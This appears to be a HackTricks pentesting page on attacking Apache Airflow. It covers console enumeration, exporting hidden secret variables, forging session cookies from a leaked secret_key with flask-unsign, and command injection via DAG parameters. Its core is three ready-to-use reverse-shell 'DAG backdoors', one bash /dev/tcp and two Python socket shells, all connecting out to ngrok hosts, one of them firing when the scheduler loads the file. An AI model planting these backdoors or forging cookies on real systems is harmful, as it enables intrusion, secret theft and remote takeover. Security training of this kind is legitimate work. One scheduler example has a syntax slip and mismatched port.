Apache Airflow Security
Reading time: 6 minutes
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Apache Airflow serves as a platform for orchestrating and scheduling data pipelines or workflows. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
Basically, Apache Airflow will allow you to schedule the execution of code when something (event, cron) happens.
Local Lab
Docker-Compose
You can use the docker-compose config file from https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
Minikube
One easy way to run apache airflow is to run it with minikube:
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
helm install airflow-release airflow-stable/airflow
# Some information about how to aceess the web console will appear after this command
# Use this command to delete it
helm delete airflow-release
Airflow Configuration
Airflow might store sensitive information in its configuration or you can find weak configurations in place:
Airflow RBAC
Before start attacking Airflow you should understand how permissions work:
Attacks
Web Console Enumeration
If you have access to the web console you might be able to access some or all of the following information:
- Variables (Custom sensitive information might be stored here)
- Connections (Custom sensitive information might be stored here)
- Access them in
http://<airflow>/connection/list/
- Access them in
- Configuration (Sensitive information like the
secret_key
and passwords might be stored here) - List users & roles
- Code of each DAG (which might contain interesting info)
Retrieve Variables Values
Variables can be stored in Airflow so the DAGs can access their values. It's similar to secrets of other platforms. If you have enough permissions you can access them in the GUI in http://<airflow>/variable/list/
.
Airflow by default will show the value of the variable in the GUI, however, according to this it's possible to set a list of variables whose value will appear as asterisks in the GUI.
However, these values can still be retrieved via CLI (you need to have DB access), arbitrary DAG execution, API accessing the variables endpoint (the API needs to be activated), and even the GUI itself!
To access those values from the GUI just select the variables you want to access and click on Actions -> Export.
Another way is to perform a bruteforce to the hidden value using the search filtering it until you get it:
Privilege Escalation
If the expose_config
configuration is set to True, from the role User and upwards can read the config in the web. In this config, the secret_key
appears, which means any user with this valid they can create its own signed cookie to impersonate any other user account.
flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
DAG Backdoor (RCE in Airflow worker)
If you have write access to the place where the DAGs are saved, you can just create one that will send you a reverse shell.
Note that this reverse shell is going to be executed inside an airflow worker container:
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator
with DAG(
dag_id='rev_shell_bash',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = BashOperator(
task_id='run',
bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
)
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
with DAG(
dag_id='rev_shell_python',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python',
python_callable=rs,
op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
)
DAG Backdoor (RCE in Airflow scheduler)
If you set something to be executed in the root of the code, at the moment of this writing, it will be executed by the scheduler after a couple of seconds after placing it inside the DAG's folder.
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
s = socket.socket()
s.connect((rhost, port))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")
rs("2.tcp.ngrok.io", 14403)
with DAG(
dag_id='rev_shell_python2',
schedule_interval='0 0 * * *',
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
run = PythonOperator(
task_id='rs_python2',
python_callable=rs,
op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
DAG Creation
If you manage to compromise a machine inside the DAG cluster, you can create new DAGs scripts in the dags/
folder and they will be replicated in the rest of the machines inside the DAG cluster.
DAG Code Injection
When you execute a DAG from the GUI you can pass arguments to it.
Therefore, if the DAG is not properly coded it could be vulnerable to Command Injection.
That is what happened in this CVE: https://www.exploit-db.com/exploits/49927
All you need to know to start looking for command injections in DAGs is that parameters are accessed with the code dag_run.conf.get("param_name")
.
Moreover, the same vulnerability might occur with variables (note that with enough privileges you could control the value of the variables in the GUI). Variables are accessed with:
from airflow.models import Variable
[...]
foo = Variable.get("foo")
If they are used for example inside a a bash command, you could perform a command injection.
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.